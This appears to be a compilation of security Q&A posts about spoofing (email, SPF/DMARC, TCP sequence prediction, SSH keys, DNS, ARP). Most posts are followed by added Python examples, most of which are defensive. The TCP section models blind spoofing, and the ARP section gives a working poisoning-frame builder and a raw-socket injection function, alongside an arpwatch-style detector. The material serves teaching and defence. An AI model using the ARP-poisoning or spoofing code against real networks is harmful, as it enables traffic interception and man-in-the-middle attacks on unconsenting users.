email spoofing – Amazon gift card phishing/spam — what’s the point?

I recently received an email message with the subject “San Diego Site Leadership and Management Team sent you an Amazon Gift Card!”, sent to my work address, apparently from “Amazon.com Gift Cards <gc-orders@gc.email.amazon.com>”.

I was suspicious because there was no mention of my employer’s name, just a generic message:

Please enjoy this $50.00 Amazon gift card to purchase
an item of your choice to kick-off Q4 and in recognition
of your hard work. We appreciate you!
#SDThePlaceToBe

It included a plausible looking “Claim Code” for the gift card. The code resembles “TIAT-UTAHBX-3V4T”. (The actual code has the same pattern of uppercase letters and decimal digits.)

To be clear, I haven’t clicked on any links in the email or tried to use the claim code, and I don’t intend to.

I checked with my employer, who confirmed that they had not sent it, and with Amazon support, who confirmed that I had not been sent an email gift card.

So far, this sounds like an ordinary phishing attempt, which I would just report and ignore, but here’s the strange part.

I’ve examined the headers and saw no suspicious links. There were several links within the email (none of which I clicked) that led to amazon.com URLs, plus sharing links at the bottom for Facebook, Twitter, Instagram, and Pinterest. As far as I can tell, even if I fell for this phishing attempt, no information would get back to whoever sent it. The claim code is presumably invalid, but if I tried to redeem it I presume it would simply fail (that’s according to Amazon support).

So my question is — what’s the point? Is this kind of phishing email without any dangerous links common? Is there any way the sender could benefit, or harm me, if I clicked on a link that goes to an amazon.com address?

I’m hesitant to share the entire message, but please let me know if more information would be helpful.
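The check a practitioner makes on a message like this is not "are the links suspicious" but "did the receiving mail server authenticate the domain shown in From:". Most MTAs stamp an Authentication-Results header with the SPF, DKIM and DMARC verdicts; a spf=pass on its own only says the envelope sender's domain permitted the sending IP, which is not the domain displayed to the reader. The following is an added example, not part of the original post, that parses that header from two constructed messages (neither is the poster's actual mail) and reports whether the visible From: domain was actually authenticated in the way DMARC defines it:

```python
"""Added example: read the receiver's Authentication-Results header and decide whether the
displayed From: domain was authenticated (SPF/DKIM alignment as DMARC defines it).
Both messages below are constructed samples, not the poster's mail."""
import email
import email.utils
import re
from email import policy

GENUINE_LOOKING = """\
Authentication-Results: mx.example.net; spf=pass smtp.mailfrom=bounces.amazon.com;
 dkim=pass header.d=amazon.com; dmarc=pass header.from=gc.email.amazon.com
From: Amazon.com Gift Cards <gc-orders@gc.email.amazon.com>
To: me@example.com
Subject: Someone sent you an Amazon Gift Card!

(body)
"""

SPOOFED_LOOKING = """\
Authentication-Results: mx.example.net; spf=pass smtp.mailfrom=bulk.example.org;
 dkim=none; dmarc=fail header.from=gc.email.amazon.com
Received: from bulk.example.org (bulk.example.org [203.0.113.10]) by mx.example.net
From: Amazon.com Gift Cards <gc-orders@gc.email.amazon.com>
To: me@example.com
Subject: San Diego Site Leadership and Management Team sent you an Amazon Gift Card!

(body)
"""

RESULT_RE = re.compile(r"\b(spf|dkim|dmarc)=(\w+)")
PROP_RE = re.compile(r"\b(smtp\.mailfrom|header\.d|header\.from)=([\w.-]+)")


def registered_domain(domain):
    """Crude organizational-domain guess (last two labels). Production code uses the Public Suffix List."""
    return ".".join(domain.lower().rstrip(".").split(".")[-2:])


def parse_authentication_results(value):
    """Extract method=result pairs and the properties (smtp.mailfrom, header.d, header.from)."""
    results = {m.group(1): m.group(2).lower() for m in RESULT_RE.finditer(value)}
    props = {m.group(1): m.group(2).lower() for m in PROP_RE.finditer(value)}
    return results, props


def assess(raw):
    msg = email.message_from_string(raw, policy=policy.default)
    results, props = parse_authentication_results(str(msg.get("Authentication-Results", "")))
    from_dom = email.utils.parseaddr(str(msg.get("From", "")))[1].rsplit("@", 1)[-1].lower()
    org = registered_domain(from_dom)
    # Alignment: the domain that passed must be the (organizational) domain shown in From:.
    spf_aligned = results.get("spf") == "pass" and registered_domain(props.get("smtp.mailfrom", "")) == org
    dkim_aligned = results.get("dkim") == "pass" and registered_domain(props.get("header.d", "")) == org
    return {
        "from_domain": from_dom,
        "spf": results.get("spf", "none"),
        "dkim": results.get("dkim", "none"),
        "dmarc": results.get("dmarc", "none"),
        # The question to ask: was the *displayed* sender verified, not just some sender?
        "header_from_authenticated": results.get("dmarc") == "pass" or spf_aligned or dkim_aligned,
    }
```

Run `assess()` over the raw source of a suspect message (most mail clients have a "show original" option). A message whose From: says amazon.com but whose only pass is an SPF pass for an unrelated bulk-mailer domain is the signature of a spoofed display name, regardless of where its links point.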

security – How to stop email spoofing within org?

I recently realized that the script I am using to send me emails from Task Scheduler can be misused: I could use the script to send an email from anyone on my Exchange to any other person.

A] How can I stop this? This is not a question about domain spoofing; this is about the script being able to use any account to send email without the password.

B] If I stop it, what changes will I need to make to my script so that I can keep receiving emails about logs and other reports and stuff?

We are using Exchange 2016. The script I am using just uses $messageParameters containing the mail Subject, Body, From, To and SMTP Server.

Does an attacker need to guess or brute-force a password for TCP spoofing?

From my understanding, TCP spoofing can be carried out if the attacker can correctly guess the sequence numbers from the response packets (to mimic the real client). The attacker may even obtain these sequence numbers via sniffing. Furthermore, a trusted connection must already exist between the target client and the server in order for the attacker to intercept/spoof.

However, I was a bit unclear as to whether the attacker would need to gain initial access to the system or network (by guessing or brute-forcing their password). In order to send the sequence numbers from response packets to the server, does the attacker need to have access to it? I am not sure whether this attacker can just send the SYN packets to the server without any access to the system/network. My concept of these things is a bit blurry right now and I would greatly appreciate some advice.

Thank you!
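The part the question circles around is that no password is involved at all: in the classic attack the server trusts a source IP (rlogin/r-services style), and the only thing standing between the attacker and a forged connection is the server's initial sequence number (ISN). Whether the attacker needs "access" depends on whether they can see the SYN-ACK (on-path) or must guess its sequence number (blind). The following added example, not from the original post, models the three-way handshake and both attacker positions; the stepping ISN scheme with a 64000 increment is stated as the model, not as the behaviour of any named OS:

```python
"""Added example: a model of the TCP handshake showing what a spoofer must know. No password
or account is involved; the only secret is the server's initial sequence number (ISN), and the
question is whether the attacker can see it (on-path) or must guess it (blind)."""
import random

MASK = 0xFFFFFFFF


class Server:
    """Listening endpoint: answers SYN with SYN-ACK(seq=ISN) and completes the connection only
    when the third packet acknowledges ISN+1. Trust is by source IP, rlogin/r-services style."""

    def __init__(self, isn_generator):
        self.next_isn = isn_generator
        self.half_open = {}          # (src_ip, src_port) -> our ISN
        self.established = set()

    def on_syn(self, src_ip, src_port, client_isn):
        isn = self.next_isn()
        self.half_open[(src_ip, src_port)] = isn
        # The SYN-ACK is routed to src_ip. A blind spoofer never sees this return value.
        return {"seq": isn, "ack": (client_isn + 1) & MASK}

    def on_ack(self, src_ip, src_port, ack):
        isn = self.half_open.pop((src_ip, src_port), None)
        if isn is None or ack != (isn + 1) & MASK:
            return False
        self.established.add((src_ip, src_port))
        return True


def stepping_isn(step=64000):
    """Predictable scheme (constructed model): a global counter advanced by a fixed step per
    connection, the kind of behaviour the classic 1990s blind-spoofing attacks relied on."""
    state = {"isn": 0}

    def gen():
        state["isn"] = (state["isn"] + step) & MASK
        return state["isn"]
    return gen


def random_isn(seed=None):
    """Modern scheme: unpredictable 32-bit ISN (seeded here only so the demo is repeatable)."""
    rng = random.Random(seed)
    return lambda: rng.getrandbits(32)


def blind_spoof(server, trusted_ip, attacker_ip, assumed_step=64000):
    """Attacker cannot sniff the server's traffic. It opens its own connection to sample the
    current ISN, then sends a SYN with trusted_ip as source and guesses ISN+step for the ACK.
    (In practice the real trusted host must also be kept from answering the stray SYN-ACK
    with a RST, e.g. by flooding it; that step is outside this model.)"""
    seen = server.on_syn(attacker_ip, 40000, 1000)["seq"]      # attacker's own, legitimate connection
    server.on_ack(attacker_ip, 40000, (seen + 1) & MASK)
    server.on_syn(trusted_ip, 514, 2000)                       # spoofed SYN; SYN-ACK goes to trusted_ip
    guess = (seen + assumed_step + 1) & MASK
    return server.on_ack(trusted_ip, 514, guess)


def on_path_spoof(server, trusted_ip):
    """Attacker who can sniff the segment carrying the SYN-ACK reads the ISN directly, so ISN
    randomisation does not help; the fix there is cryptographic (TLS/SSH), not TCP."""
    synack = server.on_syn(trusted_ip, 514, 2000)
    return server.on_ack(trusted_ip, 514, (synack["seq"] + 1) & MASK)
```

Against the stepping scheme the blind guess lands every time; against a random ISN it succeeds with probability 2^-32 per attempt, which is why blind spoofing of modern stacks is impractical while on-path spoofing remains trivial. Neither case involves guessing anyone's password.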

python – How Can I Prevent Hackers From Spoofing TCP messages onto my server?

I have a Python client and server communicating over a TCP socket – they send and receive a certain set of standardized string commands to each other.

How can I prevent a hacker from creating their own client that sends the same kind of string commands (but with their own values) to the server?

Is it right that I can assume the hacker has access to the TCP messages being transmitted/received, but not the individual code that is being executed (if I only give them the executable)?

I’m new to network security and wanted to decide how best to design my network communication scheme.

Idea – I was imagining that I could possibly encrypt the messages before sending and decrypt on the server (assuming the hacker can’t find any of the keys in the source code?). Is this a secure way of going about it and am I on the right track?
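Encrypting the commands with a key that ships inside the client binary does not solve the problem in the question: whoever has the binary has the key, and an attacker who writes their own client is exactly that person. What the server needs is proof that each frame came from an enrolled client (a per-client secret and a MAC), protection against replaying a captured frame (a counter), and its own authorization decision about what that client may do. The following is an added example, not code from the original post; the client key and frames are constructed sample data, and in a real deployment the same properties are more easily obtained from TLS with client certificates via the `ssl` module, with this authorization logic still on the server:

```python
"""Added example: authenticate each command rather than hide it. Per-client key + HMAC gives
origin authentication, a strictly increasing counter gives replay protection, and the server
decides authorization itself. Keys and frames here are constructed sample data."""
import hashlib
import hmac
import struct

TAG_LEN = 32  # HMAC-SHA256 output length


def make_frame(key, counter, command):
    """Wire format: counter (8-byte big-endian) || command bytes || HMAC-SHA256 over the rest."""
    body = struct.pack(">Q", counter) + command.encode()
    return body + hmac.new(key, body, hashlib.sha256).digest()


class CommandServer:
    def __init__(self, client_keys, allowed_commands):
        self.keys = dict(client_keys)          # client_id -> secret issued at enrolment (assumed)
        self.allowed = dict(allowed_commands)  # client_id -> set of commands it may issue
        self.last_counter = {cid: 0 for cid in self.keys}

    def handle(self, client_id, frame):
        key = self.keys.get(client_id)
        if key is None or len(frame) < 8 + TAG_LEN:
            return "REJECT unknown client or short frame"
        body, tag = frame[:-TAG_LEN], frame[-TAG_LEN:]
        expected = hmac.new(key, body, hashlib.sha256).digest()
        if not hmac.compare_digest(tag, expected):      # constant-time comparison
            return "REJECT bad MAC"
        counter = struct.unpack(">Q", body[:8])[0]
        if counter <= self.last_counter[client_id]:     # replayed or reordered frame
            return "REJECT replay"
        self.last_counter[client_id] = counter
        command = body[8:].decode("utf-8", errors="replace")
        if command not in self.allowed[client_id]:      # authenticated, but not allowed to do this
            return "REJECT not authorized"
        return "OK " + command


def demo():
    """Legitimate, replayed, forged, tampered and over-privileged frames, in that order."""
    key_a = b"constructed-secret-for-client-A"   # real key: 32 random bytes, provisioned out of band
    server = CommandServer({"A": key_a}, {"A": {"PING", "GET_STATUS"}})
    results = []
    good = make_frame(key_a, 1, "PING")
    results.append(server.handle("A", good))                              # OK PING
    results.append(server.handle("A", good))                              # REJECT replay
    forged = make_frame(b"guessed-key", 2, "GET_STATUS")                  # attacker's own client, no key
    results.append(server.handle("A", forged))                            # REJECT bad MAC
    tampered = bytearray(make_frame(key_a, 2, "PING"))
    tampered[8] ^= 0x01                                                   # flip first command byte
    results.append(server.handle("A", bytes(tampered)))                   # REJECT bad MAC
    results.append(server.handle("A", make_frame(key_a, 2, "SHUTDOWN")))  # REJECT not authorized
    results.append(server.handle("A", make_frame(key_a, 3, "GET_STATUS")))  # OK GET_STATUS
    return results
```

The point to take from `demo()`: the attacker can see every byte on the wire and even has a valid frame to copy, and still cannot get anything past the server except the exact action that frame already authorized, once. Confidentiality (encryption) is a separate property and can be layered on top if the command contents are sensitive.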

rsa – What prevents someone from spoofing their public key when trying to establish an SSH connection?

Recently I’ve been trying to learn the mechanisms behind SSH keys but I came across this question that I haven’t been able to find an answer to (I haven’t figured out how to word my question such that searching it would give me the answer).

Basically, we add our local machine’s public key to the server’s authorized_keys file which allows us to be authenticated automatically when we try to ssh into the server later on. My question is: what if someone takes my public key (it is public after all) and replaces their public key with it? When the “attacker” tries to connect to the server, what part of the process allows the server to know that they do not have the correct private key?

I read somewhere that for RSA, it is possible for a user (let's say user A) to encrypt/sign a message with their private key, and then for others to decrypt this message using A's public key, thus proving that A is really who they claim to be. However, apparently, this is not true for all cryptosystems, where it is not possible to sign with a private key (according to What happens when encrypting with private key?, feel free to correct this information if it is wrong). In those cases, how does the server make sure that the user is really who they claim to be?
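The mechanism the question is after is a challenge-response: the server never trusts the offered public key by itself. It checks that the key is listed in authorized_keys for that user, then requires the client to sign data bound to this particular connection (in SSH the signed blob includes the session identifier derived from the key exchange), and verifies that signature with the listed key. Someone holding only the public key cannot produce the signature, and a signature captured from an earlier session fails because the session identifier differs. On the second paragraph: SSH relies on signature schemes, which every key type it supports has (RSA with PKCS#1/PSS padding, ECDSA, Ed25519); "encrypting with the private key" is only a loose description of textbook RSA, and Ed25519 for instance has no encryption operation at all yet signs and verifies perfectly well. The following added example, not OpenSSH's code, walks through the exchange with a toy RSA built from fixed Mersenne primes standing in for real keys:

```python
"""Added example: why presenting someone else's public key does not get you in. The server
makes the client sign a value unique to this connection and checks that signature with the key
from authorized_keys. Toy RSA over fixed Mersenne primes stands in for a real key; real SSH keys
are 2048-bit RSA or Ed25519 and use proper padding/hashing. Not OpenSSH's code."""
import hashlib
import os

E = 65537


def toy_keypair(p, q):
    n = p * q
    d = pow(E, -1, (p - 1) * (q - 1))
    return (E, n), d           # public (e, n), private exponent d


def sign(private_d, n, data):
    h = int.from_bytes(hashlib.sha256(data).digest(), "big") % n
    return pow(h, private_d, n)


def verify(public_key, data, sig):
    e, n = public_key
    h = int.from_bytes(hashlib.sha256(data).digest(), "big") % n
    return pow(sig, e, n) == h


class SSHServer:
    def __init__(self, authorized_keys):
        self.authorized = authorized_keys      # user -> set of public keys, like authorized_keys

    def userauth(self, user, offered_key, sign_callback):
        """True only if offered_key is authorized for user AND the client proves possession of
        the matching private key by signing a fresh, session-bound blob."""
        if offered_key not in self.authorized.get(user, set()):
            return False
        session_id = os.urandom(32)            # in SSH: derived from the key exchange, new per connection
        blob = session_id + b"ssh-userauth" + user.encode()   # roughly the signed USERAUTH_REQUEST data
        return verify(offered_key, blob, sign_callback(blob))


# Alice's key uses (2^61-1, 2^89-1); Mallory's uses (2^107-1, 2^127-1). All four are Mersenne primes.
ALICE_PUB, ALICE_PRIV = toy_keypair((1 << 61) - 1, (1 << 89) - 1)
MALLORY_PUB, MALLORY_PRIV = toy_keypair((1 << 107) - 1, (1 << 127) - 1)


def scenarios():
    server = SSHServer({"alice": {ALICE_PUB}})

    def alice(blob):                       # the real client, holding Alice's private key
        return sign(ALICE_PRIV, ALICE_PUB[1], blob)

    def mallory(blob):                     # copied Alice's public key, can only sign with her own
        return sign(MALLORY_PRIV, MALLORY_PUB[1], blob)

    captured = alice(b"\x00" * 32 + b"ssh-userauthalice")   # a signature sniffed from an old session

    def replay(blob):
        return captured

    return {
        "alice": server.userauth("alice", ALICE_PUB, alice),
        "mallory_with_alice_pub": server.userauth("alice", ALICE_PUB, mallory),
        "mallory_own_key": server.userauth("alice", MALLORY_PUB, mallory),
        "replay": server.userauth("alice", ALICE_PUB, replay),
    }
```

Only the first scenario succeeds. The offered public key does nothing more than select which key the server will verify against; the private key is what the authentication actually tests.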

spoofing – Please help: possible case of SMS spoof?

So the other night my boyfriend and I got some texts from a local number saying some hateful things. We both texted back and tried calling multiple times, but the number rang and went to a strange automated voicemail. My bf texted a few things and said to call back and finally he gets a text from a completely different phone number saying to call, they are ready. Bf calls and a man answers the phone. Bf says ‘hey you told me to call’ and the guy says he got a text message from him (bf) to call. We realized something wasn’t right. The guy was obviously asleep and so bf apologized and hung up. The next day we called the original number that texted and it went to the guy again who answered the previous night. We asked the guy his number and it was completely different than what we dialed. We hung up and dialed again and it went to the guy’s number again. I looked up call spoofing and it sounds like this may be what has happened. But I couldn’t understand why when we texted or called this first number (where we got the original crazy texts from) would then forward to a totally different number. Thoughts?

bug bounty – SPF record does not prevent sender spoofing

I am a bug hunter and still new to bug bounty programs.
I've reached a topic that I can't go further on before understanding this one.

I used one of the most popular online SPF record finders; the result of this test was that they already have an SPF record.

BUT

I still can send an email as their domain exactly!

So, does an SPF record really prevent email spoofing attacks?
If it does, why can I still send an email as their domain exactly? If it doesn't, how can we really prevent email spoofing attacks?

Also, maybe I have some misunderstanding between an SPF misconfiguration and a missing SPF record.
Do they mean the same thing?!
Is the situation described above a misconfiguration or a missing SPF record?!

regards
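Two things decide whether "having an SPF record" stops anything. First, what the record ends with: `-all` tells receivers to reject unlisted senders, `~all` only asks them to mark the mail, and `+all` lets anyone pass. Second, and more often the explanation for the poster's result: SPF is evaluated against the envelope MAIL FROM (and HELO) domain, not the From: header the recipient sees, so an attacker can use a MAIL FROM under their own domain, pass SPF there, and still display the target's domain in From:. Only DMARC ties the two together through alignment. The following is an added example, not from the original post, with a minimal SPF evaluator run over constructed (hypothetical) TXT records, an auditor's classification of the record, and the alignment check:

```python
"""Added example: a minimal SPF evaluator (ip4/ip6/include/all only; no a, mx, ptr or exists)
over constructed TXT records, plus the envelope-vs-header distinction that explains why a
domain with an SPF record can still be spoofed in From:. The zone data is hypothetical."""
import ipaddress

ZONE = {   # domain -> SPF TXT record (constructed)
    "example.com": "v=spf1 ip4:192.0.2.0/24 include:_spf.mailer.example ~all",
    "_spf.mailer.example": "v=spf1 ip4:198.51.100.0/24 -all",
    "strict.example": "v=spf1 ip4:192.0.2.0/24 -all",
    "open.example": "v=spf1 +all",
    "attacker.example": "v=spf1 ip4:203.0.113.0/24 -all",
}
QUALIFIERS = {"+": "pass", "-": "fail", "~": "softfail", "?": "neutral"}


def lookup_spf(domain):
    return ZONE.get(domain.lower())


def check_host(ip, domain, depth=0):
    """RFC 7208-style result for a connecting IP and a MAIL FROM domain."""
    record = lookup_spf(domain)
    if record is None:
        return "none"          # the "missing SPF record" case
    if depth > 10 or not record.startswith("v=spf1"):
        return "permerror"
    addr = ipaddress.ip_address(ip)
    for term in record.split()[1:]:
        qualifier = "+"
        if term[0] in QUALIFIERS:
            qualifier, term = term[0], term[1:]
        if term == "all":
            matched = True
        elif term.startswith(("ip4:", "ip6:")):
            matched = addr in ipaddress.ip_network(term[4:], strict=False)
        elif term.startswith("include:"):
            matched = check_host(ip, term[8:], depth + 1) == "pass"
        else:
            return "permerror"  # mechanism not modelled in this example
        if matched:
            return QUALIFIERS[qualifier]
    return "neutral"           # nothing matched and no explicit all


def diagnose(domain):
    """What an auditor would say about the record itself (missing vs misconfigured vs enforcing)."""
    record = lookup_spf(domain)
    if record is None:
        return "missing"
    last = record.split()[-1]
    if last in ("+all", "all"):
        return "misconfigured: +all lets anyone pass"
    if last in ("~all", "?all"):
        return "weak: softfail/neutral, receivers rarely reject on it"
    if last == "-all":
        return "enforcing"
    return "no all mechanism: default neutral"


def classify_message(ip, mail_from_domain, header_from_domain):
    """SPF verdict plus the DMARC-style question: does the pass even concern the domain shown in
    From:? Strict alignment is used here; relaxed alignment compares organizational domains."""
    spf = check_host(ip, mail_from_domain)
    aligned = mail_from_domain.lower() == header_from_domain.lower()
    return {"spf": spf, "covers_header_from": spf == "pass" and aligned}
```

`classify_message("203.0.113.5", "attacker.example", "strict.example")` is the poster's situation in miniature: SPF passes (for the attacker's own domain) and says nothing about the `strict.example` shown to the reader. So the answer to "misconfiguration or missing?" can be "neither": the record may be fine and the target may simply not publish a DMARC policy with `p=reject`, or the receiving server may not enforce one.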

How to prevent DNS spoofing in Java code which obtains the name of localhost

A Fortify static scan has detected that this piece of our Java code is vulnerable to a DNS spoofing attack:

public String getLocalhostName(){
    try {
        return Inet4Address.getLocalHost().getHostName();
    } catch (UnknownHostException e) {
        return null;
    }
}

Fortify also gives these recommendations:

Recommendations:

You can increase confidence in a domain name lookup if you check to
make sure that the host’s forward and backward DNS entries match.
Attackers will not be able to spoof both the forward and the reverse
DNS entries without controlling the nameservers for the target domain.
This is not a foolproof approach however: attackers may be able to
convince the domain registrar to turn over the domain to a malicious
nameserver. Basing authentication on DNS entries is simply a risky
proposition.

My questions are:

  1. Is getting the local host name really vulnerable to such an attack? I can't imagine such a scenario.
  2. How to implement this check in practice (in this code snippet)?

Thank you.
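The check the Fortify text describes is mechanical: resolve the name to its addresses, reverse-resolve each address, and accept the name only if every PTR points back to it. The following added example, not from the original post, implements it in Python rather than Java (the other examples on this page are Python; the logic transfers directly to `InetAddress.getAllByName` and `InetAddress.getCanonicalHostName`). The resolvers are injectable so the check can be exercised against a constructed table without touching the network; the defaults use the OS resolver. Note that the machine's own hostname (`socket.gethostname()` here, the OS-level name) does not come from DNS at all; DNS only enters if the code resolves that name, and the risk Fortify is warning about only matters if the result feeds a trust decision:

```python
"""Added example: forward/reverse DNS consistency check (the Fortify recommendation), with
injectable resolvers so it runs offline against a constructed table. Defaults use the OS."""
import socket


def system_forward(name):
    return sorted({info[4][0] for info in socket.getaddrinfo(name, None)})


def system_reverse(ip):
    return socket.gethostbyaddr(ip)[0]


def fake_resolvers(forward_table, reverse_table):
    """Resolver callables over constructed tables that fail the way the real ones do (OSError)."""
    def forward(name):
        if name not in forward_table:
            raise socket.gaierror(f"no such name: {name}")
        return list(forward_table[name])

    def reverse(ip):
        if ip not in reverse_table:
            raise socket.herror(f"no PTR for {ip}")
        return reverse_table[ip]
    return forward, reverse


def forward_reverse_consistent(name, forward=system_forward, reverse=system_reverse):
    """True only if name resolves to at least one address and every address's PTR maps back to
    exactly name. Lookup failures count as inconsistent rather than raising."""
    name = name.lower().rstrip(".")
    try:
        addrs = forward(name)
    except OSError:
        return False
    if not addrs:
        return False
    for ip in addrs:
        try:
            back = reverse(ip).lower().rstrip(".")
        except OSError:
            return False
        if back != name:
            return False
    return True


def local_hostname(forward=system_forward, reverse=system_reverse):
    """socket.gethostname() comes from the OS, not DNS; the DNS round trip only happens when the
    name is resolved. Returns (name, verified) so the caller can decide how much to trust it,
    which per the Fortify advice should be: not for authentication."""
    name = socket.gethostname()
    return name, forward_reverse_consistent(name, forward, reverse)
```

The `dual.example` case in the test is the one people forget: a name with several addresses is only consistent if all of them have matching PTRs, otherwise an attacker who controls one address range can slip in.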

tls – DNS spoofing via ssl (https) by mitm with own wlan server

Problem: I have a local machine (IoT, let's call it MCC) which connects via SSL to a website (mcc.com) to get some JSON data. I would like to send modified JSON from my own server.

Idea: Set up a local device (let's call it rasp) which opens a wifi hotspot. The MCC should then connect to the rasp. The rasp answers with a certificate from the public server mcc.com, but sends the modified JSON data.

I am not familiar with DNS, but I expect this to be difficult as we do not own the public key of mcc.com. Does anyone know a solution here? The MCC does not use any kind of DNS over HTTPS.

Do I need to turn on monitor mode while doing a MITM attack and ARP spoofing?

I want to attack my old PC by ARP spoofing and do some MITM attacks. So I was wondering if I need to turn on monitor mode or if I can do those attacks in managed mode?
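ARP spoofing is a layer-2 attack on a network you are already a member of: the tool sends ordinary Ethernet frames carrying unsolicited ARP replies, and the access point forwards them like any other frame from an associated client. That is managed mode. Monitor mode exists for capturing (and injecting) raw 802.11 frames while not associated, and is what you would use for WPA handshake capture or deauthentication, not for ARP poisoning. The following added example, not from the original post, shows what actually goes on the wire (the frame builder and parser), the Linux raw-socket call that injects it through a normal interface, and the defender's side, an arpwatch-style monitor that flags an IP changing MAC. All addresses are constructed:

```python
"""Added example: what an ARP-spoofing tool puts on the wire, and how a defender spots it.
The frame is a plain Ethernet II frame on the network you are associated with, which is why a
managed-mode interface sends it; monitor mode is not involved. Addresses are constructed."""
import socket
import struct

ETH_P_ARP = 0x0806
ARP_REQUEST, ARP_REPLY = 1, 2


def mac_bytes(mac):
    return bytes.fromhex(mac.replace(":", ""))


def mac_str(raw):
    return ":".join(f"{b:02x}" for b in raw)


def build_arp(op, sender_mac, sender_ip, target_mac, target_ip):
    """Ethernet II header + 28-byte ARP payload (hardware=Ethernet, protocol=IPv4)."""
    eth = mac_bytes(target_mac) + mac_bytes(sender_mac) + struct.pack("!H", ETH_P_ARP)
    arp = struct.pack("!HHBBH", 1, 0x0800, 6, 4, op)      # htype, ptype, hlen, plen, opcode
    arp += mac_bytes(sender_mac) + socket.inet_aton(sender_ip)
    arp += mac_bytes(target_mac) + socket.inet_aton(target_ip)
    return eth + arp


def poison_frame(attacker_mac, gateway_ip, victim_mac, victim_ip):
    """Unsolicited ARP reply telling the victim 'gateway_ip is at attacker_mac'."""
    return build_arp(ARP_REPLY, attacker_mac, gateway_ip, victim_mac, victim_ip)


def parse_arp(frame):
    """Return the ARP fields of an Ethernet frame, or None if it is not Ethernet/IPv4 ARP."""
    if len(frame) < 42 or struct.unpack("!H", frame[12:14])[0] != ETH_P_ARP:
        return None
    htype, ptype, hlen, plen, op = struct.unpack("!HHBBH", frame[14:22])
    if (htype, ptype, hlen, plen) != (1, 0x0800, 6, 4):
        return None
    return {
        "op": op,
        "sender_mac": mac_str(frame[22:28]),
        "sender_ip": socket.inet_ntoa(frame[28:32]),
        "target_mac": mac_str(frame[32:38]),
        "target_ip": socket.inet_ntoa(frame[38:42]),
    }


def send_frame(frame, iface):
    """Linux only: inject through a normal (managed-mode) interface. Needs CAP_NET_RAW or root,
    so it is not exercised by the test; shown to make the point about interface modes."""
    with socket.socket(socket.AF_PACKET, socket.SOCK_RAW) as s:
        s.bind((iface, 0))
        return s.send(frame)


class ArpWatch:
    """Defender's view: remember which MAC claimed each IP and flag changes (arpwatch-style)."""

    def __init__(self):
        self.table = {}

    def observe(self, frame):
        arp = parse_arp(frame)
        if arp is None:
            return None
        ip, mac = arp["sender_ip"], arp["sender_mac"]
        previous = self.table.get(ip)
        self.table[ip] = mac
        if previous is not None and previous != mac:
            return f"ALERT {ip} changed from {previous} to {mac}"
        return None
```

`poison_frame(...)` is the whole payload of tools like arpspoof, repeated every second or so in both directions (victim and gateway) so the poisoned cache entries do not expire; with IP forwarding enabled on the attacker, traffic then transits the attacker's host. On the victim side, static ARP entries or a switch feature such as Dynamic ARP Inspection defeat it; `ArpWatch` is the minimum detection.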